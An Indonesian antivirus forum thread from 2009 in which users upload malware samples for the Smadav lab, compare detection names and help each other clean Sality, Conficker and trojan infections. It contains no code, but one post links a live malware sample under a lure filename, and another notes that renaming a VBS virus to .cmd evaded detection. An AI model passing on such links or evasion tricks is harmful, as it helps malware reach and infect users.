Ditulis oleh: jatioke pada September 24, 2009, 10:02:16 AM
Diflash disk ga bs kedelete kata windowsnya file itu dilock. Udh direname juga ga bisa. Pake smadav juga ga bisa.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada September 24, 2009, 10:09:38 AM
Diflash disk ga bs kedelete kata windowsnya file itu dilock. Udh direname juga ga bisa. Pake smadav juga ga bisa.
Coba pakai Morphost....   ;>  ;>
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada September 24, 2009, 10:13:07 AM
Diflash disk ga bs kedelete kata windowsnya file itu dilock. Udh direname juga ga bisa. Pake smadav juga ga bisa.
Coba pakai Morphost....   ;>  ;>

Bisa dijelaskan kelebihan dari morphost ???
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada September 24, 2009, 10:17:22 AM
Diflash disk ga bs kedelete kata windowsnya file itu dilock. Udh direname juga ga bisa. Pake smadav juga ga bisa.
Coba pakai Morphost....   ;>  ;>

Bisa dijelaskan kelebihan dari morphost ???
ada di  http://forum.smadav.net/index.php?topic=883.0    :)

Sama-sama bertujuan Ingin membuat Punah Virus lokal di Indonesia...  :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ★ harboot ★ pada September 24, 2009, 11:26:15 AM
Ternyata : Conficker.AL
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Jastis pada September 24, 2009, 11:29:14 AM
Ternyata : Conficker.AL

varian baru ya boot ???
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada September 24, 2009, 11:30:14 AM
Ternyata : Conficker.AL

Bahaya ngk boot ???
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ★ harboot ★ pada September 24, 2009, 11:32:05 AM
Nggak deh..
coz gw pake Esset bulan 7 detect..
Ya bahaya lah... namanya aja Virus...
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Jastis pada September 24, 2009, 11:35:10 AM
Nggak deh..
coz gw pake Esset bulan 7 detect..
Ya bahaya lah... namanya aja Virus...

sudah pasti lah...conficker lagi...
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: jatioke pada September 24, 2009, 01:05:23 PM
Iya varian baru kali. Coba bos zai diperiksa. Virus ditemukan di kompi kakak. Bersama virus yuyun, sality d dan e. Terus vbs script. Udh discan sama smadav 6.2 hilang tp balik lagi padahal system restore udh dimatiin. Dan yg terakhir smadav nya ko.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: CAH SMK NS KEMIRI pada September 25, 2009, 01:48:08 PM
Cara Upload File :
Klik Reply
Klik Additional Options...
Lalu Browse

Baru harboot perhatikan upload max naik jadi 10Mb.. mantabz
server dpt kapasitas brp mank-nya??

berarti 4share bisa ditutup aja.
upload virus lgs keforum, buat topic khusus upload.
klo ada komen tanpa upload hapus aja.. gimana??
oooo virusnya makin punah klo gtu bos up lod ga repot
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Lilik Maryono pada September 25, 2009, 03:36:16 PM
mas, setelah membuka aplikasi ini, laptop saya kena sality. smadav bs scan dan delete. tp syste sudah hancur ;>  :'(  :'(
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Jastis pada September 25, 2009, 03:56:58 PM
Ini terinfeksi Win32/Sality....mas..

Coba scan pake Avast ato Norman Malware Cleaner..
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada September 25, 2009, 05:12:51 PM
ini ada Sampel... :)   ;> Trojan kyanya...
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada September 25, 2009, 05:51:08 PM
Sality suspected...
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ĵŏřĩş™ pada September 26, 2009, 12:12:49 AM
mas, setelah membuka aplikasi ini, laptop saya kena sality. smadav bs scan dan delete. tp syste sudah hancur ;>  :'(  :'(
Yupz.......Bro.....Ini memang variannya sality......
Dideteksi ma NOD32
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ĵŏřĩş™ pada September 26, 2009, 12:19:21 AM
Sality suspected...
Bro..........kayaknya ne trojan
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ★ harboot ★ pada September 27, 2009, 08:35:17 PM
upload ke virustotal.com cek..
gw malas download virus ke laptop. he2.
lg byk kerjaan klo error nangis darah..
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada September 27, 2009, 10:48:42 PM
Sampel....  ;>  :)


by virus total:

Avast: win32.VB-ITN (Troj)

Kaspersky: Trojan-downloader.win32.VB.inz
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Oktober 02, 2009, 05:58:13 PM
Script Bandel... beredar di kampus ku...  :)

tapi autorun nya blum dapet.  :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: RefrizaL pada Oktober 02, 2009, 10:52:11 PM
@yudh, kaspersky ndetek sbagai worm.bat.autorun.dv, coba cari file extensi .bat di FD..
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Oktober 04, 2009, 09:30:05 AM
@yudh, kaspersky ndetek sbagai worm.bat.autorun.dv, coba cari file extensi .bat di FD..
aku dapet sampelnya file itu ajah...  :)   :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: jatioke pada Oktober 04, 2009, 01:21:22 PM
@yudh.  Virus dirsystem.cmd kan udh aku bahas sama bertho amq masa dibahas lagi. Source codenya juga udh aku tampilin kok. Lihat aja masih ditopik ini kok
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Oktober 04, 2009, 01:29:13 PM
@yudh.  Virus dirsystem.cmd kan udh aku bahas sama bertho amq masa dibahas lagi. Source codenya juga udh aku tampilin kok. Lihat aja masih ditopik ini kok
aku ga liat... smadav blum detek...
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Oktober 04, 2009, 01:31:05 PM
ok nanti aku Upload lagi virus yg belum kedetek sm smadav.... he...he...ikut berpartisipasi...
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: jatioke pada Oktober 04, 2009, 01:46:37 PM
Iya smadav 6.4 belum detek virus extension .bat dan .cmd kemarin aku coba virus vbs diganti extension .cmd juga ga kedetek kok. He he he
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: JSFMLK pada Oktober 05, 2009, 10:19:55 PM
Karena forum ini masih punya banyak moderator, kalo ada file yang macem2 (melanggar aturan forum atau mencurigakan) dan berukuran besar, moderator bisa langsung menghapusnya tanpa konfirmasi. :D
MAS MASALAH NIE
FOLDER KU DI HIDDEN SAMA SMADAV.....BAGAIMANA NIMBULIN LAGI.....
SAYA SUDAH KE FOLDER OPTION SAYA TIMBULKAN SEMUAH DATA TAPI TIDAK KELUAR JUGA DARI FLASHDISH SAYA.....
SETIAP SAYA BUAT FOLDER LANGSUNG AUTOMATIS DI HIDDEN....PLEASE BUAYAK DATA PENTING SAYA.......
TOLONG BERITAHU BAGAIMANA MENIMBULKAN DATA SAYA TERSEBUT?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: jatioke pada Oktober 05, 2009, 10:29:51 PM
Karena forum ini masih punya banyak moderator, kalo ada file yang macem2 (melanggar aturan forum atau mencurigakan) dan berukuran besar, moderator bisa langsung menghapusnya tanpa konfirmasi. :D
MAS MASALAH NIE
FOLDER KU DI HIDDEN SAMA SMADAV.....BAGAIMANA NIMBULIN LAGI.....
SAYA SUDAH KE FOLDER OPTION SAYA TIMBULKAN SEMUAH DATA TAPI TIDAK KELUAR JUGA DARI FLASHDISH SAYA.....
SETIAP SAYA BUAT FOLDER LANGSUNG AUTOMATIS DI HIDDEN....PLEASE BUAYAK DATA PENTING SAYA.......
TOLONG BERITAHU BAGAIMANA MENIMBULKAN DATA SAYA TERSEBUT?
smadav ga pernah menghidenkan file mas
coba discsn 1x lagi jika ada hidden klik chek all trs unhide
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: perwira pada Oktober 06, 2009, 04:59:29 PM
bro smadav 7 dah keluar
ayo buruan update
 :-bd :-bd :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: perwira pada Oktober 06, 2009, 05:52:45 PM
nice gan
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: 1412 pada Oktober 07, 2009, 10:48:26 AM
PCq kena virus lagi ! Kena virus lagi ! Lagi-lagi kena virus !!!!  :'( :'( :'(

Berikut data PCq :

OS yang dipake : Windows XP SP2
AV yang dipake : Cuma SMADAV
Kerusakan        : Untuk Sementara " Task Manager Rusak " & PC Lemot.
Jenis Virus        : Belum Di ketahui
Internet           : Conection

Setelah discan pake smadav 7, ditemukan 140 file *exe yang terinfeksi virus Sality F & Sality G, juga ada 2 file registry yang error ( DisableTaskmgr & DisableRegistryTools )..

Setelah di Fix All, Registry error bisa diperbaiki, sedangkan 140 file *exe berstatus Won't be Delete. tetapi setelah di scan lagi, Registry kembali di temukan error.

kenapa dan ada apa ini ?? Virus apa itu & Bagaimana Solusinya ?? mohon bantuannya................ ^:)^
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: jatioke pada Oktober 07, 2009, 10:52:29 AM
PCq kena virus lagi ! Kena virus lagi ! Lagi-lagi kena virus !!!!  :'( :'( :'(

Berikut data PCq :

OS yang dipake : Windows XP SP2
AV yang dipake : Cuma SMADAV
Kerusakan        : Untuk Sementara " Task Manager Rusak " & PC Lemot.
Jenis Virus        : Belum Di ketahui
Internet           : Conection

Setelah discan pake smadav 7, ditemukan 140 file *exe yang terinfeksi virus Sality F & Sality G, juga ada 2 file registry yang error ( DisableTaskmgr & DisableRegistryTools )..

Setelah di Fix All, Registry error bisa diperbaiki, sedangkan 140 file *exe berstatus Won't be Delete. tetapi setelah di scan lagi, Registry kembali di temukan error.

kenapa dan ada apa ini ?? Virus apa itu & Bagaimana Solusinya ?? mohon bantuannya................ ^:)^
yang won't be delete dikarantina ajah!
tapi kalo programnya penting coba scan pake av luar kalo ga keinfeksi yang diignore ajah
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: 1412 pada Oktober 07, 2009, 11:06:09 AM
ini attchnya ketinggalan
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: 1412 pada Oktober 07, 2009, 11:10:27 AM
ini salah satu file yang terinfeksi Virus
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Oktober 07, 2009, 01:46:16 PM
@Boo

wahh... pantas AV nya hanya smadav... ??? , pakai AV luar juga , apalagi PC nya konek ke internet...  :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Jastis pada Oktober 07, 2009, 01:57:02 PM
ini salah satu file yang terinfeksi Virus

Boo...klo upload file di zip dulu bro....
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Oktober 07, 2009, 02:10:58 PM
@Boo

iya bro... maukkan ke dalam folder dulu, baru di Zip....

untungnya Avast gw sakti... langsung di Blok tuh koneksi Opera gw...
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Jastis pada Oktober 07, 2009, 02:15:46 PM
tadi gw mau upload...eh langsung....didetect sama ansav....dan avast.....
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ★ harboot ★ pada Oktober 07, 2009, 04:23:20 PM
brooo... jangan bmp masukkin gambar...
mau lihat gambar kyak download mp3 aja..
he2..
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: 1412 pada Oktober 08, 2009, 10:31:53 AM
Sorry, Sorry...  ^:)^  ^:)^

Maaf kalo banyak yang salah, ini aq attch lg dalam format *rar.

brooo... jangan bmp masukkin gambar...
mau lihat gambar kyak download mp3 aja..
he2..

Cara buat Screenshot dlm format jpg gmn?

@Boo

wahh... pantas AV nya hanya smadav... ??? , pakai AV luar juga , apalagi PC nya konek ke internet...  :D


Bisa Tolong ksaih aq link buat download AV Luar? Please ( Yang Gratisan Yaa )  :P
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Oktober 08, 2009, 10:41:26 AM
@Boo

iya boo,... ini virus varian sality....  :)

untuk AV luar gratis..... http://www.Avast.com    :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: 1412 pada Oktober 08, 2009, 11:02:24 AM
Avast bisa basmi virus varian sality kan?? file terinfeksi dirusak juga kah?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Deny MiniDwarf pada Oktober 08, 2009, 11:05:27 AM
atau coba avg...donlod disini www.grisoft.com
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Oktober 08, 2009, 11:06:32 AM
Avast bisa basmi virus varian sality kan?? file terinfeksi dirusak juga kah?
Bisa..... Avast punya fitur VRDB (Virus Recovery Database)  :)  

klo mau cobain versi Professionalnya, download aja.... Trial selama 60 hari Original..   nih linknya:
http://www.avast.com/eng/download-avast-professional.html
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: 1412 pada Oktober 08, 2009, 11:15:46 AM
atau coba avg...donlod disini www.grisoft.com

Bukannya sok tahu & jelek2in tapi aq udah pernah pake AVG, virusnya memang hilang tapi fileq banyak yang Crash.. so trauma pke lg... ;> ;>
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Vinzz pada Oktober 08, 2009, 11:17:59 AM
@boo

kalo sality, ada 3 pilihan(AV free):
1.Avast (avast.com)
2.Avast (avast.com)
3.Avast lagi.......

pilih aja salah satu....
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Deny MiniDwarf pada Oktober 08, 2009, 11:18:44 AM
atau coba aja ansav...lumayan tuh...
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Jastis pada Oktober 08, 2009, 11:21:23 AM
All....

back to topic....jangan bahas AV disini..sudah tempat2 masing.....
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: 1412 pada Oktober 08, 2009, 01:36:05 PM
Jdi gmn, file yang aq upload bisa dipastikan virus??
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: poeriko pada Oktober 08, 2009, 03:39:18 PM
klo Error 99 pa virus ta? :-\
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Oktober 08, 2009, 03:47:06 PM
@boo

itu memang benar virus boo,  sality varian,,,,

klo mau lebih jelas, upload aja ke http://www.virustotal.com     hampir semua AV mendeteksinya sebagai virus
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Jastis pada Oktober 08, 2009, 03:52:55 PM
Sorry, Sorry...  ^:)^  ^:)^

Maaf kalo banyak yang salah, ini aq attch lg dalam format *rar.

brooo... jangan bmp masukkin gambar...
mau lihat gambar kyak download mp3 aja..
he2..

Cara buat Screenshot dlm format jpg gmn?

@Boo

wahh... pantas AV nya hanya smadav... ??? , pakai AV luar juga , apalagi PC nya konek ke internet...  :D


Bisa Tolong ksaih aq link buat download AV Luar? Please ( Yang Gratisan Yaa )  :P

Ini virus sejenis win32/Sality.....terdetect sama avast...nih scrshrtnya...
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: kido pada Oktober 08, 2009, 05:04:41 PM
Untuk removal virus Sality silahkan coba Norman, Kaspersky, atau Norton karena sudah saya tes dan bisa merepair file terinfeksi. Buruan remove sebelum file EXE rusak semua karena diinjeksi berulang - ulang
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: 1412 pada Oktober 09, 2009, 08:54:42 AM
@Kido

bisa kasih link download AV yang kamu sebutin??
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: kido pada Oktober 09, 2009, 04:50:48 PM
@Boo
Norman Malware Cleaner (Cleaner) http://normanasa.vo.llnwd.net/o29/public/Norman_Malware_Cleaner.exe
Kaspersky AVP Tool (Cleaner) http://devbuilds.kaspersky-labs.com/devbuilds/AVPTool/
Kaspersky AntiVirus (Cleaner + RTP) http://www.kaspersky.com/kav_latest_versions?downlink=206910890

Semoga berhasil
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: R380RN pada Oktober 09, 2009, 09:21:49 PM
Ini kang Pesanan nya saya antar, Salah satu file yang di detec sbg virus Sality.G oleh Smadav Rev 6.2



nah itu juga tuh kang ane mu tanya gimana cara ngilangin tuh virus???
masalahnya laptop ane gak bisa ilang juga.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: 1412 pada Oktober 10, 2009, 12:29:44 PM
Thankz bgt Bang Kido.....
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Oktober 10, 2009, 12:41:33 PM
ada Sampel, suspected trojan.Agent 
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Oktober 10, 2009, 12:48:26 PM
sampel lagi.... suspected.trojan.agent  lagi....  menurut virus total sih Trojan.Agent
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ĵŏřĩş™ pada Oktober 10, 2009, 02:20:34 PM
sampel lagi.... suspected.trojan.agent  lagi....  menurut virus total sih Trojan.Agent
Terdeteksi Trojan ma KIS
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Jastis pada Oktober 10, 2009, 02:28:47 PM
sampel lagi.... suspected.trojan.agent  lagi....  menurut virus total sih Trojan.Agent
Terdeteksi Trojan ma KIS

avast juga gitu.....
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: kido pada Oktober 10, 2009, 05:42:20 PM
File tersebut terdeteksi sebagai W32/Agent menurut Norman Security Suite
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Oktober 12, 2009, 11:08:47 AM
Sampelnya ini dapet dari warnet... ;>  ;> :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: LAniXX pada Oktober 14, 2009, 05:06:31 PM
lagi asik internetan AVG ngasih info ada virus trojan horse downloader generic8.CBWW  result infected
nih aku upload file yg ke infected
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: LAniXX pada Oktober 14, 2009, 05:08:58 PM
loh ko 0kb  :-\ :-\ :-\ :-\ :-\ :-\ :-\ apa ga mau di upload  :-\ :-\
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ajojing pada Oktober 15, 2009, 08:57:19 PM
coba aja download :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Oktober 16, 2009, 06:35:50 PM
Upload.....  :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: kido pada Oktober 17, 2009, 02:38:42 PM
lagi asik internetan AVG ngasih info ada virus trojan horse downloader generic8.CBWW  result infected
nih aku upload file yg ke infected
Filenya 0 Kb.. mungkin virusnya gak mau diupload.. coba di zip/rar terus upload lagi

@Yudh
Itu virus, folder.htt
Thanks..
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: H4ck3rKu pada Oktober 18, 2009, 08:55:48 PM
Sample Virus (http://www.indowebster.com/Virus_Recycler.html).....:)

Keterangan :

Best Regards,
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ★ harboot ★ pada Oktober 18, 2009, 09:39:07 PM
@atas.. download idws repot,
disuruh nyari2 dulu.. upload disini aja donk.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada Oktober 18, 2009, 10:01:19 PM
Ada sampel virus baru..(worm). :)
Mudah2an mas zai memasukan virus ini ke dalam databasenya smadav revisi berikutnya... :D 


=>By: virustotal.com

AntiVir      : Worm/Autorun.abi.3
Avast      : AutoIt:Balero-A2
Kaspersky   : Packed.Win32.Klone.bj
McAfee      : W32/Autorun.worm.zf.gen
Microsoft   : Worm AutoIt/Renocide.gen!A
Symantec   : W32.Harakit
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Zai pada Oktober 18, 2009, 10:24:53 PM
Ok, kumpulkan aja virusnya, nanti akan diteliti di lab smadav ;)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: H4ck3rKu pada Oktober 18, 2009, 10:39:57 PM
Avast             4.8.1351.0    2009.10.13    Win32:Trojan-gen
BitDefender               7.2    2009.10.14    BehavesLike:Trojan.FWDisable
Comodo                     2599    2009.10.13    Heur.Packed.Unknown
Kaspersky               7.0.0.125    2009.10.14    Trojan.Win32.Swisyn.eyb
McAfee-GW-Edition     6.8.5    2009.10.14    Heuristic.LooksLike.Win32.Suspicious.B!83
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada Oktober 18, 2009, 11:05:59 PM
Sampel virus (alman). :)


By: virustotal.com

AVG      => Win32/Alman
BitDefender   => Win32.Almanahe.D
ClamAV   => W32.Alman-2
Kaspersky   => Virus.Win32.Alman.b
Microsoft   => Virus:Win32/Almanahe.B
Norman   => W32/Alman.B
Panda   => W32/Almanahe.C
Symantec   => W32.Almanahe.B!inf
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ĵŏřĩş™ pada Oktober 19, 2009, 12:01:06 AM
Sampel virus (alman). :)


By: virustotal.com

AVG      => Win32/Alman
BitDefender   => Win32.Almanahe.D
ClamAV   => W32.Alman-2
Kaspersky   => Virus.Win32.Alman.b
Microsoft   => Virus:Win32/Almanahe.B
Norman   => W32/Alman.B
Panda   => W32/Almanahe.C
Symantec   => W32.Almanahe.B!inf
Alman ini baru ditemuin ya bro MiloMen?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada Oktober 19, 2009, 06:26:28 AM
Alman ini baru ditemuin ya bro MiloMen?

Virus alman ini sudah lama, baru2 ini aja saya upload :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Oktober 21, 2009, 10:56:14 AM
Suspected virus?  ???  ;)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Oktober 23, 2009, 11:18:08 AM
Infection conficker....
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Jastis pada Oktober 27, 2009, 09:32:05 AM
http://www.4shared.com/file/120998894/b6ac8690/Poker_free_chip.html
q mau upload buat smadav tapi ngak tau caranya jadi q tulis di sini aja.
mohon bagi yg tidak mengerti soal frogram virus jgn di download ya! dari pada loe jadi install ulang

Thanks
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Andi_Evandy pada Oktober 28, 2009, 08:11:05 PM
Suspected virus?  ???  ;)
Bitdefender Mendeteksi sbg:Trojan.Generic.2507884
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Oktober 29, 2009, 11:17:47 AM
Sality lagi....  :-[
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Oktober 29, 2009, 07:49:47 PM
Trojan Acad....  :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ViGunZ pada Oktober 29, 2009, 07:52:19 PM
Trojan Acad baru pernah liat nich, Low Med apa High level nich Trojan  :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Oktober 29, 2009, 07:55:51 PM
Trojan Acad baru pernah liat nich, Low Med apa High level nich Trojan  :D

di virus total, sebagian besar AV mendeteksinya.... :)

Trojan ini berkembang di para pengguna Autocad.... :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ViGunZ pada Oktober 29, 2009, 07:56:50 PM
gw ngak pake Autocad. aman dech  8)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: amirdtr pada November 07, 2009, 05:53:07 PM
Borong virus dari (suatu) satu komputer. :D Sudah diupload ke 4shared Smadav.
File-file tersebut diantaranya:

FalseAlarm_Conficker.rar
Infected_SalityD.rar
NewHeuristic(198).rar
PCMAV_Heuristic.rar
SysFake.Logoff.rar
SysFake.WScript.rar
VBS.VirusCode.rar

Juga disertakan file pendukung berupa log scanning:
SalityInfected_Comp_ScanPCMAV.log
SalityInfected_Comp_ScanSMADAV.txt

Download di attachment :D  :-bd

BAGIAN PERTAMA :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: amirdtr pada November 07, 2009, 05:55:25 PM
BAGIAN KEDUA :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: amirdtr pada November 07, 2009, 05:58:03 PM
Borong virus dari (suatu) satu komputer. :D Sudah diupload ke 4shared Smadav.
File-file tersebut diantaranya:

FalseAlarm_Conficker.rar
Infected_SalityD.rar
NewHeuristic(198).rar
PCMAV_Heuristic.rar
SysFake.Logoff.rar
SysFake.WScript.rar
VBS.VirusCode.rar

Juga disertakan file pendukung berupa log scanning:
SalityInfected_Comp_ScanPCMAV.log
SalityInfected_Comp_ScanSMADAV.txt

Download di attachment :D  :-bd

BAGIAN PERTAMA :D
BAGIAN KEDUA :D

FILE PENDUKUNG: LOG SCANNING :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada November 12, 2009, 09:04:24 PM
Sampel virus baru dari RECYCLER, smadav rev. 7.3 sudah bisa menditeksi tapi belum bisa membasmi. :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: little_kid pada November 18, 2009, 06:40:23 AM
aplot hkcmd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: little_kid pada November 18, 2009, 06:41:50 AM
aplot jusched.exe (java)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Zai pada November 18, 2009, 06:42:45 AM
aplot hkcmd

Emang Sality kok :D

Lihat ini :
http://www.virustotal.com/analisis/f4f9dd0ef1c984ecd4b0166685c47f24e724f351711797fbd9b5b90cbeafb6bb-1258501337
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ajojing pada November 18, 2009, 04:24:53 PM
lapor!

di temukan beberapa virus yg blum di terdeteksi!

1 di antaranya (bat.rar) klo di liat dari source kodenya berusaha mencoba untuk mematikan Av impor & merusak registry komp. Bahkan di situ vimakernya menyangkut nama Smadav :D


cek aja gan.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Jastis pada November 21, 2009, 10:32:41 AM
Coba cek dulu yg ini...kemarin ada salah satu yg masih di quarantine Smadav...... ;)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: rwin pada November 22, 2009, 12:32:06 AM
Virus
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: crazywork pada November 24, 2009, 08:42:37 AM
tolong dong,,virus ini bikin pusing,,maaf bentuknya video blue gitu moga2 ga ada yg marah,,saya uda apus tapi muncul lg,,muncul lg,,tolong analisa dan bantuannya,,cuz saya masih gaptek  :-[ :-[,,hehehe,,thx  :) :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Zai pada November 24, 2009, 11:20:46 AM
tolong dong,,virus ini bikin pusing,,maaf bentuknya video blue gitu moga2 ga ada yg marah,,saya uda apus tapi muncul lg,,muncul lg,,tolong analisa dan bantuannya,,cuz saya masih gaptek  :-[ :-[,,hehehe,,thx  :) :)

Scan pakai Smadav terbaru ;)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Astbat pada November 24, 2009, 02:31:55 PM
Nih AKu Punya Sample
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Choppedcity pada November 24, 2009, 03:31:54 PM
@crazywork
bukannya itu virus shemale cry?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: crazywork pada November 25, 2009, 08:03:06 AM
sebelumya terima kasih buat snior2 uda mau respon keluhan saya,,,

@ Zai, smadav yg baru dapetinnya gimana??
ada yg gratis atau harus bayarkah???
dimana bisa downloadnya??
mohon bantuan infonya :) :)

@choppedcity, iya saya mau pastiin,,ternyata mang bener shemale,,thx analisanya,,, :D :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ★ harboot ★ pada November 25, 2009, 11:35:46 AM
@crazy,, silahkan cari info di situs : www.smadav.net
pertanyaan diatas juga sering ditanyakan dalam forum,
coba di search,, otreee,,
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: crazywork pada November 26, 2009, 08:44:24 AM
@harboot,,thx yap,,uda didownload smadav terbarunya,,n virus shemale-nya dah ilang,,terimakasih banyak banyak,,,
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Astbat pada November 26, 2009, 12:19:38 PM
Coficker -2 nih blom ke detck ama smadav tapi kalo ama ansav ke deteck
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada November 27, 2009, 01:16:35 PM
ada bingkisan virus buat Smadav... Runonce.worm

Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ĵŏřĩş™ pada November 27, 2009, 01:32:04 PM
ada bingkisan virus buat Smadav... Runonce.worm


Yupz........KIS mendeteksinya dengan baik

(http://i47.tinypic.com/amv7r.jpg)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: black_341469 pada November 27, 2009, 02:34:07 PM
tambahan, avast juga mendeteksinya.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: amirdtr pada November 27, 2009, 05:27:10 PM
ada bingkisan virus buat Smadav... Runonce.worm



Nah ini dia 'biang kerok'-nya yang membuat semua file *.exe dilahap ketika diclean dengan PCMAV :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: RIZON BARNS MAGNOXIDE pada November 27, 2009, 05:39:08 PM
